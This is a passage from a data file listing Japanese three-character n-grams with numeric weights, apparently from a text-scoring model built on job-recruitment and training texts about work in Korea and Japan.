('このイ', 0.30103),
('この旅', 0.30103),
('この機', 0.30103),
('この節', 0.30103),
('この黄', 0.30103),
('これら', 0.30103),
('ござい', 0.000387366),
('ご出発', 0.30103),
('ご満足', 0.30103),
('ご覧く', 0.30103),
('ご訪問', 0.30103),
('させて', 0.30103),
('させま', 0.30103),
('さった', 0.30103),
('さと献', 0.30103),
('さなけ', 0.30103),
('さの尊', 0.30103),
('さまざ', 0.30103),
('さらな', 0.0202034),
('さらに', 0.150365),
('さる熱', 0.30103),
('された', 0.0859543),
('されて', 0.0878238),
('されま', 0.0793885),
('される', 0.110907),
('さを保', 0.30103),
('さんが', 0.0669468),
('さんと', 0.0115819),
('さんの', 0.30103),
('ざいま', 0.000390502),
('ざまな', 0.30103),
('しい機', 0.30103),
('しい職', 0.30103),
('しかし', 0.30103),
('しくご', 0.30103),
('しく思', 0.30103),
('しさの', 0.30103),
('しさを', 0.30103),
('したい', 0.234671),
('したら', 0.30103),
('したカ', 0.30103),
('したニ', 0.30103),
('したモ', 0.30103),
('した名', 0.30103),
('した学', 0.117188),
('した服', 0.30103),
('した生', 0.30103),
('してい', 0.0198098),
('してお', 0.0631708),
('してき', 0.30103),
('してく', 0.0299632),
('しての', 0.30103),
('しては', 0.30103),
('しても', 0.30103),
('してサ', 0.30103),
('してフ', 0.30103),
('して与', 0.184747),
('して使', 0.30103),
('して働', 0.0142404),
('して協', 0.30103),
('して参', 0.232357),
('して学', 0.30103),
('して心', 0.30103),
('して設', 0.30103),
('して迅', 0.124939),
('して面', 0.30103),
('しと指', 0.30103),
('しなく', 0.30103),
('しまし', 0.0116458),
('します', 0.0238327),
('しみい', 0.30103),
('しめる', 0.30103),
('しょう', 0.0454608),
('し上げ', 0.30103),
('し引い', 0.176091),
('し引か', 0.176091),
('し続け', 0.176091),
('し話し', 0.30103),
('し韓国', 0.30103),
('じてく', 0.30103),
('じて経', 0.30103),
('じられ', 0.30103),
('じスキ', 0.30103),
('すぐ登', 0.30103),
('すこと', 0.188306),
('すでに', 0.30103),
('すので', 0.30103),
('すべき', 0.00975984),
('すべて', 0.125782),
('すよう', 0.30103),
('するこ', 0.0399753),
('するた', 0.107263),
('するだ', 0.30103),
('するの', 0.30103),
('するま', 0.30103),
('するト', 0.30103),
('するビ', 0.102489),
('するル', 0.30103),
('する事', 0.220724),
('する先', 0.30103),
('する可', 0.30103),
('する学', 0.30103),
('する少', 0.30103),
('する必', 0.176091),
('する方', 0.184747),
('する海', 0.30103),
('する特', 0.0147803),
('する私', 0.30103),
('する第', 0.30103),
('する能', 0.30103),
('する証', 0.30103),
('する語', 0.30103),
('する資', 0.30103),
('する間', 0.30103),
('する際', 0.30103),
('ずに韓', 0.30103),
('せかけ', 0.30103),
('せくだ', 0.30103),
('せてい', 0.30103),
('せなが', 0.30103),
('せます', 0.30103),
('ぜなら', 0.30103),
('そして', 0.176091),
('そのた', 0.30103),
('その中', 0.30103),
('その分', 0.176091),
('その期', 0.30103),
('それぞ', 0.179818),
('それを', 0.30103),
('それ以', 0.30103),
('ぞれの', 0.180909),
('たいと', 0.30103),
('たいの', 0.30103),
('たいミ', 0.30103),
('たい人', 0.0713708),
('たい学', 0.30103),
('たい方', 0.0503507),
('たい生', 0.30103),
('たい経', 0.124939),
('たおか', 0.30103),
('たがす', 0.30103),
('たしま', 0.30103),
('ただき', 0.0859325),
('ただく', 0.30103),
('ただけ', 0.30103),
('ただし', 0.30103),
('たちが', 0.0542945),
('たちに', 0.146775),
('たちの', 0.0532075),
('たちは', 0.111937),
('たちを', 0.30103),
('たな活', 0.30103),
('たの成', 0.30103),
('たの言', 0.30103),
('たはそ', 0.30103),
('たはア', 0.01524),
('たは揺', 0.30103),
('ために', 0.0141977),
('ための', 0.027235),
('たりに', 0.30103),
('たれた', 0.30103),
('たを待', 0.30103),
('たを日', 0.30103),
('たカイ', 0.30103),
('たコー', 0.09691),
('たニュ', 0.30103),
('たモチ', 0.30103),
('た仕事', 0.30103),
('た他の', 0.30103),
('た名だ', 0.30103),
('た基準', 0.22528),
('た外食', 0.30103),
('た姉妹', 0.30103),
('た学生', 0.100086),
('た扉を', 0.30103),
('た服装', 0.30103),
('た業務', 0.188306),
('た民族', 0.30103),
('た生徒', 0.30103),
('た研修', 0.30103),
('た資機', 0.30103),
('だきま', 0.30103),
('だく必', 0.30103),
('だけで', 0.0644738),
('だける', 0.30103),
('だけ早', 0.30103),
('ださい', 0.0157591),
('ださっ', 0.30103),
('ださり', 0.30103),
('ださる', 0.30103),
('だたる', 0.30103),
('だわり', 0.30103),
('ちが自', 0.30103),
('ちなが', 0.30103),
('ちに実', 0.30103),
('ちに対', 0.30103),
('ちに感', 0.30103),
('ちのア', 0.30103),
('ちのカ', 0.09691),
('ちのプ', 0.30103),
('ちの下', 0.30103),
('ちの優', 0.30103),
('ちの写', 0.30103),
('ちは両', 0.30103),
('ちは外', 0.30103),
('ちは皆', 0.30103),
('ちを信', 0.30103),
('ちんと', 0.198182),
('ったお', 0.30103),
('った人', 0.30103),
('った仕', 0.30103),
('った他', 0.30103),
('った基', 0.225172),
('った外', 0.30103),
('った業', 0.188306),
('ってい', 0.0126924),
('ってお', 0.221058),
('ってき', 0.176091),
('ってく', 0.30103),
('っても', 0.30103),
('って出', 0.0579919),
('って大', 0.30103),
('って最', 0.30103),
('って韓', 0.01524),
('ついて', 0.0425437),
('つけら', 0.30103),
('つける', 0.30103),
('つため', 0.30103),
('つであ', 0.30103),
('つなが', 0.30103),
('つのポ', 0.124939),
('つもの', 0.30103),
('つ労働', 0.191944),
('つ方の', 0.0994485),
('つ星ホ', 0.01524),
('つ講師', 0.30103),
('ていた', 0.107913),
('ていて', 0.0150191),
('ていま', 0.0127549),
('ている', 0.102742),
('ていれ', 0.30103),
('ておく', 0.0263289),
('ており', 0.0523109),
('てお伝', 0.130343),
('てから', 0.30103),
('てがう', 0.30103),
('てきま', 0.117487),
('てくだ', 0.0185344),
('てくれ', 0.30103),
('てさら', 0.30103),
('てのレ', 0.30103),
('ての学', 0.30103),
('ての建', 0.226139),
('ての役', 0.30103),
('ての溶', 0.0579919),
('ての良', 0.188306),
('てまし', 0.30103),
('てもコ', 0.30103),
('ても一', 0.30103),
('ても不', 0.30103),
('ても学', 0.30103),
('てサポ', 0.30103),
('てシン', 0.01524),
('てフェ', 0.30103),
('て与え', 0.184747),
('て使わ', 0.30103),
('て働き', 0.0791812),
('て出迎', 0.0579919),
('て協力', 0.30103),
('て参り', 0.232446),
('て大き', 0.30103),
('て学習', 0.30103),
('て心か', 0.30103),
('て日本', 0.30103),
('て最新', 0.30103),
('て溶接', 0.124939),
('て経験', 0.30103),
('て設立', 0.30103),
('て説明', 0.124939),
('て迅速', 0.124939),
('て道徳', 0.30103),
('て面接', 0.30103),
('て韓国', 0.01524),
('であり', 0.122887),
('である', 0.0950373),
('でいま', 0.30103),
('でおり', 0.211436),
('できな', 0.291125),
('できま', 0.105518),
('できる', 0.0578699),
('でくだ', 0.0791812),
('でした', 0.30103),
('でしょ', 0.221686),
('ですか', 0.124939),
('ですが', 0.30103),
('ででき', 0.30103),
('でとう', 0.000338107),
('でなく', 0.0874061),
('でにな', 0.30103),
('でに効', 0.30103),
('でのさ', 0.30103),
('でのロ', 0.30103),
('での介', 0.30103),
('での新', 0.30103),
('での機', 0.30103),
('での言', 0.244443),
('での食', 0.30103),
('ではき', 0.30103),
('ではな', 0.30103),
('では先', 0.30103),
('では韓', 0.30103),
('でも頑', 0.30103),
('でより', 0.30103),
('でアク', 0.30103),
('でクラ', 0.30103),
('でコミ', 0.30103),
('でシー', 0.30103),
('でミャ', 0.30103),
('で一般', 0.124939),
('で事業', 0.30103),
('で仕事', 0.30103),
('で住宅', 0.30103),
('で健康', 0.30103),
('で働い', 0.30103),
('で働き', 0.0652503),
('で働く', 0.0481234),
('で優位', 0.30103),
('で元従', 0.30103),
('で募集', 0.124939),
('で勤め', 0.30103),
('で十分', 0.30103),
('で取り', 0.30103),
('で合格', 0.30103),
('で困難', 0.30103),
('で多く', 0.30103),
('で実務', 0.30103),
('で実習', 0.30103),
('で少な', 0.30103),
('で幅広', 0.30103),
('で必要', 0.30103),
('で日本', 0.30103),
('で最大', 0.30103),
('で来る', 0.0263289),
('で正確', 0.30103),
('で求め', 0.124939),
('で溶接', 0.0157943),
('で特定', 0.30103),
('で理解', 0.294078),
('で管理', 0.225605),
('で組織', 0.30103),
('で経験', 0.213107),
('で緊急', 0.124939),
('で練習', 0.30103),
('で能力', 0.30103),
('で行っ', 0.30103),
('で訓練', 0.30103),
('で輸入', 0.30103),
('で雇用', 0.01524),
('で電気', 0.01524),
('で韓国', 0.102315),
('で食事', 0.30103),
('という', 0.155273),
('といっ', 0.30103),
('とうご', 0.000387711),
('とから', 0.30103),
('とがで', 0.0677293),
('とが大', 0.30103),
('とが必', 0.188306),
('とが最', 0.30103),
('とが重', 0.30103),
('ときに', 0.0263289),
('とされ', 0.110885),
('とした', 0.30103),
('として', 0.0126444),
('とだけ', 0.30103),
('とって', 0.216791),
('とです', 0.30103),
('ととも', 0.214561),
('となく', 0.30103),
('となり', 0.30103),
('となる', 0.30103),
('とにな', 0.30103),
('とに尽', 0.286539),
('とに注', 0.30103),
('とに目', 0.30103),
('とのつ', 0.30103),
('との協', 0.01524),
('との連', 0.30103),
('とは一', 0.30103),
('とは問', 0.30103),
('とまで', 0.30103),
('とめ漢', 0.30103),
('ともに', 0.21515),
('とをお', 0.30103),
('とをよ', 0.30103),
('とを保', 0.30103),
('とを心', 0.30103),
('とを目', 0.30103),
('とを確', 0.30103),
('とサー', 0.0768165),
('とネピ', 0.30103),
('と仕事', 0.30103),
('と候補', 0.30103),
('と健康', 0.176091),
('と労働', 0.30103),
('と学習', 0.30103),
('と実技', 0.0222764),
('と専門', 0.30103),
('と建設', 0.30103),
('と手を', 0.30103),
('と指導', 0.30103),
('と提携', 0.30103),
('と日本', 0.124939),
('と永続', 0.30103),
('と準備', 0.30103),
('と献身', 0.30103),
('と理解', 0.188306),
('と経験', 0.124939),
('と良い', 0.30103),
('と行い', 0.30103),
('と規律', 0.30103),
('と記念', 0.0137883),
('と関連', 0.30103),
('どで働', 0.30103),
('どで勤', 0.30103),
('どに興', 0.30103),
('どに関', 0.30103),
('どの慈', 0.30103),
('どの経', 0.176091),
('どもた', 0.30103),
('ども授', 0.30103),
('どんな', 0.30103),
('ど必要', 0.30103),
('ないこ', 0.30103),
('ないで', 0.30103),
('ないよ', 0.219407),
('ない事', 0.30103),
('ない会', 0.176091),
('ない励', 0.30103),
('ない場', 0.30103),
('なかっ', 0.30103),
('ながら', 0.222103),
('ながり', 0.30103),
('なき成', 0.30103),
('なくと', 0.176091),
('なく就', 0.30103),
('なく日', 0.30103),
('なく活', 0.30103),
('なけれ', 0.30103),
('なぜな', 0.30103),
('なたが', 0.30103),
('なたの', 0.206468),
('なたは', 0.30103),
('なたを', 0.185692),
('などで', 0.235579),
('などに', 0.295864),
('などの', 0.144632),
('なども', 0.30103),
('など必', 0.30103),
('なの日', 0.30103),
('なりま', 0.104697),
('なるこ', 0.176091),
('なるビ', 0.30103),
('なる仕', 0.30103),
('なる成', 0.30103),
('なる経', 0.0222764),
('なアド', 0.30103),
('なイン', 0.176091),
('なエン', 0.124939),
('なスキ', 0.30103),
('なスピ', 0.30103),
('なトレ', 0.30103),
('なビザ', 0.0994485),
('なプロ', 0.30103),
('な仕事', 0.30103),
('な会話', 0.30103),
('な伝統', 0.30103),
('な体験', 0.30103),
('な価格', 0.30103),
('な先生', 0.30103),
('な内容', 0.124939),
('な問題', 0.20056),
('な喜び', 0.30103),
('な場合', 0.216514),
('な女性', 0.30103),
('な姿勢', 0.30103),
('な娘と', 0.30103),
('な学習', 0.30103),
('な建設', 0.30103),
('な成績', 0.30103),
('な技術', 0.10394),
('な指導', 0.30103),
('な振る', 0.30103),
('な支援', 0.30103),
('な旅を', 0.30103),
('な日本', 0.30103),
('な旬の', 0.30103),
('な機械', 0.30103),
('な活躍', 0.30103),
('な溶接', 0.176091),
('な漢字', 0.30103),
('な睡眠', 0.30103),
('な経験', 0.130563),
('な考え', 0.30103),
('な職場', 0.203063),
('な良い', 0.30103),
('な語彙', 0.30103),
('な課題', 0.30103),
('な講師', 0.187562),
('な郡区', 0.30103),
('な関係', 0.30103),
('な限り', 0.30103),
('な面だ', 0.30103),
('にあな', 0.30103),
('にある', 0.178954),
('にいま', 0.30103),
('におい', 0.30103),
('におけ', 0.228003),
('にお伝', 0.30103),
('にお問', 0.30103),
('にきれ', 0.30103),
('にここ', 0.30103),
('にこれ', 0.30103),
('にご満', 0.30103),
('にして', 0.176091),
('にする', 0.30103),
('につい', 0.0425078),
('にとっ', 0.21624),
('になり', 0.195012),
('になる', 0.30103),
('にはワ', 0.30103),
('には下', 0.30103),
('には言', 0.30103),
('には誰', 0.00998422),
('にも包', 0.30103),
('にも卓', 0.30103),
('にも英', 0.30103),
('にやっ', 0.30103),
('によっ', 0.0579919),
('により', 0.115696),
('にサポ', 0.198778),
('にトク', 0.30103),
('にヤン', 0.0222764),
('に一生', 0.30103),
('に仕事', 0.0228312),
('に付け', 0.30103),
('に会社', 0.30103),
('に伝え', 0.30103),
('に備え', 0.30103),
('に優秀', 0.09691),
('に入れ', 0.30103),
('に出ま', 0.30103),
('に分け', 0.184747),
('に到着', 0.176091),
('に加え', 0.30103),
('に努め', 0.30103),
('に効果', 0.30103),
('に勤め', 0.30103),
('に十分', 0.246592),
('に参加', 0.221386),
('に取り', 0.176091),
('に合っ', 0.178413),
('に合格', 0.0132694),
('に同行', 0.30103),
('に向け', 0.30103),
('に在住', 0.30103),
('に外国', 0.30103),
('に実習', 0.30103),
('に実践', 0.30103),
('に寝る', 0.30103),
('に対し', 0.06767),
('に対す', 0.012545),
('に就い', 0.30103),
('に就く', 0.30103),
('に尽力', 0.287026),
('に当社', 0.30103),
('に従事', 0.158946),
('に徹底', 0.30103),
('に必要', 0.0669468),
('に応じ', 0.30103),
('に応募', 0.30103),
('に思い', 0.30103),
('に思う', 0.30103),
('に感謝', 0.30103),
('に成功', 0.30103),
('に戻る', 0.30103),
('に手頃', 0.30103),
('に扱い', 0.0848442),
('に投資', 0.30103),
('に指導', 0.30103),
('に提供', 0.30103),
('に損失', 0.30103),
('に支援', 0.30103),
('に新し', 0.30103),
('に日本', 0.100036),
('に時間', 0.30103),
('に最善', 0.30103),
('に期待', 0.30103),
('に来て', 0.124939),
('に来ら', 0.176091),
('に残業', 0.30103),
('に気を', 0.09691),
('に求め', 0.124939),
('に沿っ', 0.30103),
('に注力', 0.30103),
('に活用', 0.30103),
('に減ら', 0.30103),
('に渡っ', 0.30103),
('に献身', 0.30103),
('に登録', 0.124939),
('に目指', 0.30103),
('に知識', 0.30103),
('に立つ', 0.30103),
('に置き', 0.30103),
('に自信', 0.30103),
('に自動', 0.30103),
('に興味', 0.30103),
('に行き', 0.30103),
('に行く', 0.124939),
('に覚え', 0.0263289),
('に設立', 0.11729),
('に話さ', 0.30103),
('に話す', 0.188306),
('に詳し', 0.30103),
('に負け', 0.176091),
('に送り', 0.30103),
('に遭遇', 0.30103),
('に選ば', 0.30103),
('に関す', 0.30103),
('に関連', 0.265124),
('に韓国', 0.30103),
('に食品', 0.09691),
('ねた研', 0.30103),
('のある', 0.176203),
('のお知', 0.30103),
('のこだ', 0.30103),
('のご出', 0.30103),
('のさら', 0.30103),
('のため', 0.0343289),
('のつな', 0.30103),
('のであ', 0.30103),
('のもと', 0.01524),
('のもの', 0.30103),
('のよう', 0.0847882),
('のアク', 0.30103),
('のアプ', 0.176091),
('のイメ', 0.30103),
('のイン', 0.30103),
('のウェ', 0.0579919),
('のカス', 0.09691),
('のカテ', 0.184747),
('のサポ', 0.30103),
('のサー', 0.30103),
('のシナ', 0.30103),
('のシン', 0.00755314),
('のスピ', 0.0222764),
('のゼー', 0.30103),
('のチャ', 0.0871165),
('のトラ', 0.30103),
('のトレ', 0.30103),
('のネイ', 0.30103),
('のビザ', 0.189174),
('のファ', 0.30103),
('のプロ', 0.208412),
('のポジ', 0.0669468),
('のリー', 0.30103),
('のレス', 0.30103),
('のレッ', 0.30103),
('のロー', 0.30103),
('の一つ', 0.30103),
('の一部', 0.113829),
('の下で', 0.30103),
('の世界', 0.30103),
('の両方', 0.225062),
('の中で', 0.30103),
('の人材', 0.30103),
('の介護', 0.30103),
('の仕事', 0.0337866),
('の休暇', 0.176091),
('の会話', 0.211225),
('の住宅', 0.200436),
('の使用', 0.30103),
('の依頼', 0.30103),
('の修繕', 0.30103),
('の健康', 0.30103),
('の優先', 0.30103),
('の元で', 0.30103),
('の共同', 0.30103),
('の写真', 0.30103),
('の出発', 0.09691),
('の分野', 0.086422),
('の初め', 0.0579919),
('の初回', 0.30103),
('の副大', 0.0579919),
('の労働', 0.259734),
('の勤勉', 0.30103),
('の勤務', 0.30103),
('の北海', 0.30103),
('の協力', 0.01524),
('の受講', 0.09691),
('の受験', 0.124939),
('の可能', 0.30103),
('の合格', 0.30103),
('の名義', 0.30103),
('の周辺', 0.30103),
('の命名', 0.30103),
('の国の', 0.30103),
('の基礎', 0.30103),
('の売買', 0.30103),
('の大人', 0.30103),
('の大型', 0.09691),
('の大都', 0.30103),
('の姉妹', 0.30103),
('の子ど', 0.30103),
('の子会', 0.30103),
('の存続', 0.30103),
('の学位', 0.126649),
('の学士', 0.30103),
('の学生', 0.178664),
('の実践', 0.30103),
('の専門', 0.30103),
('の尊厳', 0.30103),
('の就職', 0.219153),
('の工場', 0.30103),
('の幼い', 0.09691),
('の建物', 0.167298),
('の建設', 0.107587),
('の当た', 0.30103),
('の役割', 0.30103),
('の待遇', 0.0222764),
('の従業', 0.192567),
('の必要', 0.30103),
('の応募', 0.30103),
('の慈善', 0.30103),
('の成功', 0.30103),
('の成果', 0.30103),
('の手配', 0.30103),
('の技術', 0.30103),
('の指導', 0.135673),
('の授業', 0.30103),
('の提供', 0.30103),
('の支店', 0.30103),
('の支援', 0.30103),
('の教室', 0.124939),
('の教師', 0.30103),
('の文化', 0.0688388),
('の新た', 0.30103),
('の新潟', 0.30103),
('の方が', 0.01524),
('の旅に', 0.30103),
('の旅を', 0.127623),
('の日に', 0.124939),
('の日本', 0.0793542),
('の最初', 0.30103),
('の有名', 0.30103),
('の期間', 0.30103),
('の東京', 0.30103),
('の様子', 0.30103),
('の機会', 0.115471),
('の残業', 0.176091),
('の活動', 0.30103),
('の源で', 0.30103),
('の準備', 0.30103),
('の溶接', 0.0579919),
('の熟練', 0.01524),
('の特別', 0.0994485),
('の現状', 0.30103),
('の環境', 0.30103),
('の生活', 0.30103),
('の皆さ', 0.30103),
('の目標', 0.01524),
('の目的', 0.0222764),
('の磨き', 0.09691),
('の福岡', 0.30103),
('の秋田', 0.30103),
('の竣工', 0.30103),
('の管理', 0.184747),
('の節目', 0.30103),
('の細部', 0.30103),
('の紹介', 0.268572),
('の経費', 0.176091),
('の経験', 0.0819763),
('の給与', 0.30103),
('の習慣', 0.30103),
('の職を', 0.30103),
('の職場', 0.30103),
('の背後', 0.30103),
('の自動', 0.30103),
('の良い', 0.188306),
('の若者', 0.30103),
('の要件', 0.30103),
('の言う', 0.30103),
('の言葉', 0.30103),
('の言語', 0.116398),
('の訓練', 0.30103),
('の設計', 0.30103),
('の評価', 0.124939),
('の詳細', 0.142224),
('の貴重', 0.30103),
('の賞賛', 0.243477),
('の輸入', 0.186552),
('の通り', 0.265598),
('の造船', 0.00510284),
('の連携', 0.30103),
('の達成', 0.30103),
('の適切', 0.30103),
('の重要', 0.176091),
('の間に', 0.176091),
('の面接', 0.0125891),
('の韓国', 0.01524),
('の食品', 0.30103),
('の食材', 0.30103),
('の高い', 0.14956),
('の黄金', 0.30103),
('はあり', 0.108934),
('はきち', 0.30103),
('はそれ', 0.30103),
('はない', 0.30103),
('はアブ', 0.01524),
('はコス', 0.30103),
('はニュ', 0.176091),
('はミャ', 0.30103),
('はワー', 0.30103),
('は一生', 0.30103),
('は下記', 0.30103),
('は両親', 0.30103),
('は交通', 0.30103),
('は以下', 0.264667),
('は信頼', 0.30103),
('は先輩', 0.30103),
('は問題', 0.30103),
('は外国', 0.0142938),
('は揺る', 0.30103),
('は支払', 0.30103),
('は日本', 0.30103),
('は溶接', 0.30103),
('は理念', 0.30103),
('は皆様', 0.30103),
('は自動', 0.30103),
('は自己', 0.30103),
('は言語', 0.21624),
('は誰が', 0.00998422),
('は通常', 0.30103),
('は重要', 0.30103),
('は韓国', 0.30103),
('は高齢', 0.30103),
('ばなり', 0.30103),
('ばれる', 0.30103),
('ば尚良', 0.30103),
('ば銀行', 0.30103),
('びたい', 0.0989105),
('びです', 0.30103),
('び政府', 0.30103),
('び民間', 0.271985),
('ぶこと', 0.224176),
('ぶにし', 0.30103),
('へのこ', 0.30103),
('へのご', 0.30103),
('への出', 0.09691),
('への就', 0.30103),
('への旅', 0.30103),
('への最', 0.30103),
('へよう', 0.0163904),
('へ出発', 0.09691),
('べきこ', 0.176091),
('べきで', 0.00998422),
('べき金', 0.176091),
('べてが', 0.30103),
('べての', 0.178078),
('まくい', 0.30103),
('まざま', 0.30103),
('ました', 0.00915605),
('ましと', 0.30103),
('ましょ', 0.0539321),
('ますの', 0.30103),
('ますよ', 0.30103),
('ません', 0.0738182),
('または', 0.0147233),
('までに', 0.30103),
('まで幅', 0.30103),
('まとめ', 0.30103),
('まな郡', 0.30103),
('みいた', 0.30103),
('みの日', 0.124939),
('みます', 0.30103),
('みんな', 0.30103),
('み出し', 0.176091),
('むこと', 0.211533),
('むため', 0.0222764),
('むサビ', 0.30103),
('めてい', 0.0669468),
('めてか', 0.30103),
('めてく', 0.30103),
('めての', 0.0579919),
('めでと', 0.000337319),
('めない', 0.30103),
('めにこ', 0.208212),
('めには', 0.124939),
('めにも', 0.30103),
('めにヤ', 0.0222764),
('めに一', 0.30103),
('めに十', 0.30103),
('めに寝', 0.30103),
('めに必', 0.124939),
('めに登', 0.124939),
('めのも', 0.30103),
('めの実', 0.30103),
('めの授', 0.30103),
('めの支', 0.30103),
('めの日', 0.30103),
('めの特', 0.0994485),
('めまし', 0.30103),
('めるこ', 0.30103),
('めるよ', 0.30103),
('める学', 0.30103),
('める際', 0.30103),
('め漢字', 0.30103),
('もあり', 0.30103),
('もう十', 0.30103),
('もが評', 0.30103),
('もきち', 0.30103),
('もし韓', 0.30103),
('もたち', 0.30103),
('もなく', 0.30103),
('もにあ', 0.30103),
('もので', 0.30103),
('もコミ', 0.30103),
('もサポ', 0.30103),
('も一生', 0.30103),
('も不思', 0.30103),
('も包括', 0.30103),
('も卓越', 0.30103),
('も学ぶ', 0.30103),
('も授業', 0.30103),
('も政府', 0.30103),
('も果た', 0.30103),
('も自分', 0.30103),
('も英語', 0.30103),
('も行っ', 0.30103),
('も身に', 0.30103),
('も開い', 0.30103),
('も頑張', 0.30103),
('やお手', 0.30103),
('やって', 0.30103),
('やキッ', 0.30103),
('やサー', 0.184747),
('や伝統', 0.30103),
('や候補', 0.30103),
('や専門', 0.184747),
('や文化', 0.30103),
('や機会', 0.30103),
('や生活', 0.176091),
('や研修', 0.30103),
('や筆記', 0.30103),
('や肉の', 0.30103),
('や韓国', 0.30103),
('ようこ', 0.0163904),
('ような', 0.30103),
('ように', 0.0429098),
('よく聞', 0.30103),
('よって', 0.0579919),
('よび政', 0.30103),
('よび民', 0.271654),
('より直', 0.30103),
('より良', 0.30103),
('らしい', 0.30103),
('らしさ', 0.30103),
('らしま', 0.30103),
('らです', 0.30103),
('らなる', 0.0202034),
('らに詳', 0.30103),
('らのお', 0.30103),
('らのリ', 0.30103),
('らの初', 0.0579919),
('らの手', 0.30103),
('られて', 0.184747),
('られな', 0.30103),
('られま', 0.176091),
('られる', 0.0688527),
('ら午後', 0.163914),
('ら厨房', 0.30103),
('ら多く', 0.30103),
('ら差し', 0.176091),
('ら常に', 0.30103),
('ら感謝', 0.30103),
('ら指導', 0.30103),
('ら日本', 0.234002),
('ら来た', 0.30103),
('ら民族', 0.30103),
('ら直接', 0.30103),
('ら直輸', 0.30103),
('ら移行', 0.193139),
('ら許可', 0.30103),
('りがと', 0.30103),
('りして', 0.30103),
('りしま', 0.30103),
('りです', 0.266523),
('りと専', 0.30103),
('りにす', 0.30103),
('りに思', 0.211141),
('りまし', 0.128138),
('ります', 0.0205875),
('りませ', 0.0737337),
('りを継', 0.30103),
('り合い', 0.30103),
('り巻く', 0.30103),
('り手掛', 0.30103),
('り直接', 0.30103),
('り組む', 0.30103),
('り組め', 0.30103),
('り組ん', 0.30103),
('り良い', 0.30103),
('り込ん', 0.30103),
('るかの', 0.30103),
('るから', 0.30103),
('るぎな', 0.30103),
('ること', 0.0221995),
('るこの', 0.30103),
('るそれ', 0.30103),
('るため', 0.0432154),
('るだけ', 0.135782),
('るとき', 0.0263289),
('ると良', 0.30103),
('るのは', 0.30103),
('るべき', 0.176091),
('るまで', 0.30103),
('るよう', 0.193714),
('るケー', 0.30103),
('るサー', 0.30103),
('るトレ', 0.30103),
('るニュ', 0.30103),
('るバス', 0.30103),
('るビザ', 0.0708517),
('るビジ', 0.281449),
('るリー', 0.30103),
('るルー', 0.30103),
('る事業', 0.221276),
('る仕事', 0.30103),
('る企業', 0.30103),
('る候補', 0.30103),
('る先生', 0.30103),
('る前向', 0.30103),
('る可能', 0.136764),
('る場合', 0.30103),
('る学位', 0.30103),
('る学校', 0.30103),
('る学生', 0.30103),
('る少人', 0.30103),
('る当社', 0.30103),
('る従業', 0.30103),
('る必要', 0.0738655),
('る成功', 0.30103),
('る敬意', 0.30103),
('る方に', 0.184747),
('る機会', 0.30103),
('る海外', 0.30103),
('る準備', 0.30103),
('る潜在', 0.30103),
('る熱心', 0.30103),
('る特定', 0.0147803),
('る私の', 0.30103),
('る経験', 0.0211893),
('る習慣', 0.30103),
('る能力', 0.30103),
('る舞い', 0.30103),
('る見込', 0.124939),
('る証明', 0.30103),
('る語彙', 0.30103),
('る豊か', 0.30103),
('る資格', 0.30103),
('る際の', 0.30103),
('る際使', 0.30103),
('る韓国', 0.30103),
('れいに', 0.30103),
('れぞれ', 0.180307),
('れたコ', 0.09691),
('れた姉', 0.30103),
('れた学', 0.30103),
('れた資', 0.30103),
('れてい', 0.0635322),
('れなか', 0.30103),
('れの国', 0.30103),
('れの職', 0.30103),
('ればな', 0.30103),
('れば尚', 0.30103),
('れば銀', 0.30103),
('れまし', 0.154819),
('れます', 0.0846172),
('れらの', 0.30103),
('れるこ', 0.30103),
('れるた', 0.124939),
('れるべ', 0.176091),
('れるバ', 0.30103),
('れるビ', 0.155515),
('れるリ', 0.30103),
('れる前', 0.30103),
('れる見', 0.124939),
('れを示', 0.30103),
('れ以上', 0.30103),
('わずに', 0.30103),
('わせく', 0.30103),
('わせて', 0.30103),
('わりと', 0.30103),
('われる', 0.30103),
('をお楽', 0.30103),
('をお祈', 0.176091),
('をお見', 0.30103),
('をかけ', 0.0869122),
('をして', 0.0873299),
('をしま', 0.19117),
('をする', 0.30103),
('をつけ', 0.30103),
('をでき', 0.30103),
('をとり', 0.30103),
('をよく', 0.30103),
('をサポ', 0.134643),
('をシン', 0.01524),
('をマス', 0.25527),
('を丁寧', 0.30103),
('を上手', 0.30103),
('を今後', 0.30103),
('を付け', 0.09691),
('を代表', 0.30103),
('を使っ', 0.188306),
('を促進', 0.18508),
('を保ち', 0.30103),
('を保証', 0.30103),
('を信じ', 0.18206),
('を信頼', 0.203025),
('を克服', 0.30103),
('を出発', 0.30103),
('を募集', 0.108442),
('を卒業', 0.178078),
('を厳守', 0.0791812),
('を取り', 0.176091),
('を取得', 0.148949),
('を受け', 0.0516423),
('を可能', 0.30103),
('を向上', 0.30103),
('を問わ', 0.30103),
('を営ん', 0.30103),
('を基本', 0.30103),
('を変え', 0.30103),
('を多く', 0.30103),
('を大切', 0.30103),
('を奨励', 0.30103),
('を学び', 0.153057),
('を学ぶ', 0.30103),
('を学生', 0.30103),
('を完全', 0.30103),
('を尊敬', 0.30103),
('を少し', 0.30103),
('を少な', 0.30103),
('を尽く', 0.30103),
('を差し', 0.176091),
('を常に', 0.30103),
('を建設', 0.294045),
('を待つ', 0.30103),
('を得て', 0.30103),
('を心配', 0.30103),
('を感じ', 0.30103),
('を手に', 0.30103),
('を扱っ', 0.30103),
('を抱き', 0.30103),
('を拠点', 0.30103),
('を拡張', 0.30103),
('を持た', 0.30103),
('を持ち', 0.199776),
('を持っ', 0.0074982),
('を持つ', 0.0605093),
('を捨て', 0.30103),
('を排除', 0.30103),
('を掴む', 0.30103),
('を掴ん', 0.09691),
('を提供', 0.0475223),
('を支給', 0.30103),
('を教え', 0.230249),
('を日本', 0.148726),
('を最大', 0.30103),
('を流暢', 0.188306),
('を深め', 0.30103),
('を理解', 0.0541194),
('を生み', 0.176091),
('を目の', 0.30103),
('を目指', 0.30103),
('を知っ', 0.30103),
('を確信', 0.30103),
('を確認', 0.143198),
('を磨く', 0.137222),
('を示し', 0.30103),
('を祈っ', 0.30103),
('を祈り', 0.30103),
('を祝う', 0.0222764),
('を積み', 0.30103),
('を積む', 0.0205871),
('を積め', 0.30103),
('を築く', 0.30103),
('を継続', 0.30103),
('を続け', 0.30103),
('を緊急', 0.0669468),
('を練習', 0.30103),
('を育て', 0.30103),
('を育み', 0.30103),
('を育ん', 0.30103),
('を育成', 0.30103),
('を自分', 0.09691),
('を行い', 0.0579919),
('を行う', 0.30103),
('を行っ', 0.136303),
('を見せ', 0.30103),
('を見つ', 0.203888),
('を見抜', 0.30103),
('を視察', 0.0579919),
('を設立', 0.30103),
('を証明', 0.30103),
('を誇り', 0.21083),
('を軽減', 0.219741),
('を辞め', 0.30103),
('を迎え', 0.30103),
('を通し', 0.181508),
